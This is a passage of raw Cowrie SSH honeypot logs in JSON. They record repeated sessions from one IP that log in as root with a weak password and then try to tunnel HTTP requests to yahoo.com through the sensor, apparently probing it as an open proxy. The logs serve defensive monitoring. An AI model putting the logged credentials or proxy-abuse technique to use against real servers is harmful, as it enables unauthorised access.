c-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.611311Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.846646Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31703,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31703","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.895390Z","session":"11a30ba288c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:33.942556Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10147,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10147","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.077470Z","session":"11a30ba288c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.124780Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.172896Z","src_ip":"213.209.150.239","session":"11a30ba288c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23391,"dst_ip":"1.2.3.4","dst_port":22,"session":"225e70684b19","protocol":"ssh","message":"New connection: 213.209.150.239:23391 (1.2.3.4:22) [session: 225e70684b19]","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.228599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.229435Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.286077Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.568853Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":29238,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29238","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.626691Z","session":"225e70684b19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.683508Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25006,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25006","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.839106Z","session":"225e70684b19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.895692Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.953027Z","src_ip":"213.209.150.239","session":"225e70684b19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23439,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b74ad2c2560","protocol":"ssh","message":"New connection: 213.209.150.239:23439 (1.2.3.4:22) [session: 2b74ad2c2560]","sensor":"my-vps","timestamp":"2025-08-26T01:02:34.999046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.000173Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.047302Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.281755Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4100,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4100","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.329814Z","session":"2b74ad2c2560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.377107Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":393,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:393","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.513546Z","session":"2b74ad2c2560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.560766Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.609233Z","src_ip":"213.209.150.239","session":"2b74ad2c2560"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23490,"dst_ip":"1.2.3.4","dst_port":22,"session":"fec620e862fe","protocol":"ssh","message":"New connection: 213.209.150.239:23490 (1.2.3.4:22) [session: fec620e862fe]","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.655372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.656259Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.703516Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.938506Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":27739,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27739","sensor":"my-vps","timestamp":"2025-08-26T01:02:35.986606Z","session":"fec620e862fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.033990Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24645,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24645","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.169534Z","session":"fec620e862fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.216763Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.264646Z","src_ip":"213.209.150.239","session":"fec620e862fe"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23536,"dst_ip":"1.2.3.4","dst_port":22,"session":"07fe18f4b0f4","protocol":"ssh","message":"New connection: 213.209.150.239:23536 (1.2.3.4:22) [session: 07fe18f4b0f4]","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.320357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.321503Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.378110Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.659870Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31471,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31471","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.718052Z","session":"07fe18f4b0f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.774776Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29260,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29260","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.930979Z","session":"07fe18f4b0f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:36.987742Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.045232Z","src_ip":"213.209.150.239","session":"07fe18f4b0f4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23576,"dst_ip":"1.2.3.4","dst_port":22,"session":"90d1a15a6b30","protocol":"ssh","message":"New connection: 213.209.150.239:23576 (1.2.3.4:22) [session: 90d1a15a6b30]","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.101114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.102345Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.159042Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.441823Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20382,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20382","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.499576Z","session":"90d1a15a6b30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.556446Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":18326,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18326","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.710958Z","session":"90d1a15a6b30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.767706Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.825387Z","src_ip":"213.209.150.239","session":"90d1a15a6b30"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23631,"dst_ip":"1.2.3.4","dst_port":22,"session":"c58570a97fcf","protocol":"ssh","message":"New connection: 213.209.150.239:23631 (1.2.3.4:22) [session: c58570a97fcf]","sensor":"my-vps","timestamp":"2025-08-26T01:02:37.871541Z"}
